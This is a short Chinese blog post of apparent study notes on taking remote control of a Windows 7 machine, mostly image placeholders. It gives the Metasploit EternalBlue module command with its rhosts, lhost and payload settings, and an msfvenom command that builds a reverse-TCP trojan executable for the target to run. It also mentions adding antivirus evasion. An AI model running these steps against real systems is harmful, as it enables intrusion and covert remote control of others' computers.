远程控制服务器权限

远程控制服务器权限

中文版切换

image-20241226201557610

image-20241226201226780

1.metasploit简介及基础使用

image-20241226201332576

win7大概率存在一个漏洞:永恒之蓝

win10:永恒之黑

攻击条件:

攻击机器:kali

目标机器:win7

目标服务器的地址:1.直接在机器上ipconfig

2.在同意网段使用nmap扫描

攻击机器进入操作台:

进入root后输入metasploit

三步完成攻击:

image-20241226204008154

image-20241226203207552

use exploit/windows/smb/ms17_010_eternalblue

show options

rhosts:攻击地址

payload:攻击载荷

image-20241226204250358

lhosts:监听主机设置

image-20241226204402751

image-20241226204541169

设置必选项

最后启动运行

image-20241226205125550

想通过run vnc做桌面要将权限从超级用户变为用户

操作成功后

image-20241226205557131

不通过漏洞来获得系统权限

1.生成木马

image-20241226205651991

image-20241226205811758

windows也可改为linux

msfvenom -p windows/x64/eterpreter/reverse_tcp lhost= lport= -f exe -o demo.exe

然后会生成一个木马,同CS直接让目标机器运行

image-20241226210020857

image-20241226210041898

还要记得开启监听

加免杀

image-20241226210618840

posted @ 2024-12-29 19:03  w0e6x  阅读(20)  评论(0)    收藏  举报